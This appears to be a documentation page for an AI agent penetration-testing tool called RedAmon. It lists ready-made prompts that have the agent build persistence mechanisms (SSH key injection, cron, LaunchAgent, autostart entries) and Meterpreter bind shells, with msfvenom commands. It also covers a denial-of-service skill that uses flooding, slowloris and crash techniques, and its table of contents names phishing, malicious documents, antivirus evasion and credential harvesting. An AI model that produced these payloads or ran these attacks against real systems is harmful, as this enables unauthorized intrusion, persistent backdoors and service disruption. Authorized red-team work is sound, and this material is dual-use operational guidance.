
105. SSH authorized_keys injection (Linux)

What the agent does: Generates SSH key pair + writes an injection script via execute_code
Victim triggers: Unaware — attacker can SSH in at any time using the injected public key
Prompt: Generate an SSH key pair and write an injection script via execute_code — victim triggers unknowingly when the attacker SSHs in using the injected public key at any time

106. Cron job persistence (Linux)

What the agent does: Generates ELF payload + installs a crontab entry via execute_code
Victim triggers: Automatically every hour when cron executes the payload
Prompt: Generate a Meterpreter ELF payload and a crontab installation script via execute_code — victim triggers automatically every hour when cron re-executes the payload

107. Launch Agent persistence (macOS)

What the agent does: Generates Mach-O payload + writes a LaunchAgent .plist via execute_code
Victim triggers: Automatically when the victim logs into their macOS account
Prompt: Generate a macOS Mach-O Meterpreter payload and a LaunchAgent plist via execute_code — victim triggers automatically when they log in and the Launch Agent starts the payload

108. .desktop file autostart (Linux)

What the agent does: Generates ELF payload + writes a .desktop autostart entry via execute_code
Victim triggers: Automatically when the victim logs into their desktop session
Prompt: Generate a Linux ELF payload and a .desktop autostart entry via execute_code — victim triggers automatically when they log into their desktop session

Bind Shells (no tunnel needed)

Bind shells reverse the connection direction — the payload opens a listening port on the victim, and the attacker connects to it. Useful when tunnels are not available or the victim has a public IP.

109. Windows bind shell EXE

What the agent does: msfvenom -p windows/meterpreter/bind_tcp -f exe
Victim triggers: Runs the .exe → it opens a listening port → attacker connects directly
Prompt: Generate a Windows bind shell payload (windows/meterpreter/bind_tcp) — victim triggers by running the .exe which opens a listening port, then the attacker connects directly

110. Linux bind shell ELF

What the agent does: msfvenom -p linux/x64/meterpreter/bind_tcp -f elf
Victim triggers: Runs ./payload.elf → it opens a listening port → attacker connects directly
Prompt: Generate a Linux bind shell payload (linux/x64/meterpreter/bind_tcp) — victim triggers by running ./payload.elf which opens a listening port, then the attacker connects directly

111. macOS bind shell Mach-O

What the agent does: msfvenom -p osx/x64/meterpreter/bind_tcp -f macho
Victim triggers: Runs the binary → it opens a listening port → attacker connects directly
Prompt: Generate a macOS bind shell payload (osx/x64/meterpreter/bind_tcp) — victim triggers by running the binary which opens a listening port, then the attacker connects directly

112. Python bind shell (cross-platform)

What the agent does: msfvenom -p python/meterpreter/bind_tcp -f raw
Victim triggers: Runs python payload.py → it opens a listening port → attacker connects directly
Prompt: Generate a cross-platform Python bind shell (python/meterpreter/bind_tcp) — victim triggers by running python payload.py which opens a listening port, then the attacker connects directly

Denial of Service (DoS)

Classification: denial_of_service Badge: DoS (red) Tools: metasploit_console, kali_shell (hping3, slowhttptest), execute_code, execute_curl

Disrupts service availability using flooding, resource exhaustion, and crash exploits. Unlike other skills, DoS does not provide access — the agent uses action="complete" after verifying impact and never transitions to post-exploitation.

Key Differences from Other Skills

No post-exploitation — DoS disrupts, it doesn't grant access
Vector-based tool selection — each DoS category has its own optimal tool (not a global priority)
Assessment-only mode — optional safety setting to only check for vulnerabilities without attacking
Forbidden in stealth mode — all DoS techniques are inherently noisy

Project Settings

Setting	Default	Description
Max Duration	60s	Max seconds per individual DoS attempt
Max Attempts	3	Max different vectors to try before reporting resilient
Concurrent Connections	1000	Connections for app-layer DoS (slowloris, slowhttptest)
Assessment Only	Off	Only check for DoS vulnerabilities without attacking

DoS Vector Categories

Category	Tool	When to Use
Known CVE DoS	`metasploit_console`	Confirmed DoS CVE (MS12-020, MS15-034, etc.)
HTTP Application DoS	`kali_shell` → slowhttptest	HTTP/HTTPS web servers (slowloris, slow POST, range)
Layer 4 Flooding	`kali_shell` → hping3	Generic TCP/UDP/ICMP flood
Application Logic DoS	`execute_code`	ReDoS, XML bomb, GraphQL depth, zip bomb
Single-Request Crash	`execute_curl`	Malformed header or overflow triggers crash

Example Workflow

You: "DoS the web server on 10.0.0.5"

Informational phase: Agent queries graph for service info, runs nmap -sV, researches known DoS CVEs
Classification: Classified as denial_of_service
Exploitation phase: Agent selects vector (e.g., slowloris for Apache), executes slowhttptest, verifies impact with curl
Completion: Reports success/failure with action="complete" — no post-exploitation

Unclassified Fallback

Classification: <descriptive_term>-unclassified (e.g., ssrf-unclassified, file_upload-unclassified) Badge: grey Tools: All available exploitation tools

When no skill (built-in or user) matches the request and no user skill covers the technique, the classifier generates a descriptive snake_case term followed by -unclassified:

"Test for SSRF on the API" → ssrf-unclassified
"Upload a web shell" → file_upload-unclassified

The agent uses all available tools generically without a mandatory workflow. The ReAct reasoning loop handles these based on the LLM's general knowledge.

Tip: Instead of relying on the unclassified fallback, consider uploading a user skill for your technique. A custom .md file with specific tool commands and workflow steps will produce significantly better results than the generic fallback.

Next Steps

AI Agent Guide — full guide to the AI agent chat interface, phases, and tools
Project Settings Reference — configure Hydra, phishing SMTP, and tool phase restrictions
EvoGraph — Attack Chain Evolution — how attack chains and findings are tracked across sessions

RedAmon GitHub Repository | Report an Issue | Back to Home

Home

Getting Started

Core Workflow

Scanning & OSINT

AI & Automation

Analysis & Reporting

Reference & Help

Attack Skills

Attack Skills

Table of Contents

Overview

User Attack Skills

Uploading a New Skill

Editing a Skill Description

Writing a Skill File

Example Skill Files

Enabling Skills per Project

How Classification Works

Classification Badge

Built-in Skills

CVE (MSF)

Hydra Brute Force

Phishing / Social Engineering

How It Works: The 6-Step Workflow

Method A: Standalone Payload (msfvenom)

Payload + Format Matrix

Method B: Malicious Document (Metasploit Fileformat)

B1: Word Document with VBA Macro (.docm)

B2: Excel Document with VBA Macro (.xlsm)

B3: PDF with Embedded Executable (Adobe Reader)

B4: RTF with HTA Handler (CVE-2017-0199)

B5: LNK Shortcut File

Important: Fileformat Module Output Location

Method C: Web Delivery (Fileless)

Target Selection

Method D: HTA Delivery Server

The Handler

Delivery Methods

Chat Download (Default)

Email Delivery (On Request)

Web Delivery Link (Methods C & D)

SMTP Configuration for Email Delivery

AV Evasion Techniques

Shikata Ga Nai Encoding

Template Injection (Trojanizing)

Multiple Encoders

Bad Character Avoidance

Post-Exploitation After Phishing

Troubleshooting

Example Scenarios

Scenario 1: Windows EXE Payload via Chat Download

Scenario 2: Malicious Excel Macro via Email

Scenario 3: PowerShell Web Delivery

Scenario 4: Android APK Backdoor

Scenario 5: RTF Exploit (No Macro Approval Needed)

Scenario 6: AV Evasion with Encoded Payload

Quick-Start Suggestions Catalogue

1. Standalone Payloads

Windows

Linux

macOS

Android

Cross-Platform

2. Malicious Documents

3. Web Delivery (Fileless)

Windows

Linux / macOS

Cross-Platform

4. LOLBin & Bypass Techniques

5. Evasion & Encoding

Windows

Linux / macOS

Android

Advanced

6. Credential Harvesting

7. Email Campaigns

Payload Delivery

Credential Phishing

Social Engineering Pretexts

8. Persistence & Bind Shells

Persistence Mechanisms

Bind Shells (no tunnel needed)

Denial of Service (DoS)

Key Differences from Other Skills

Project Settings

DoS Vector Categories

Example Workflow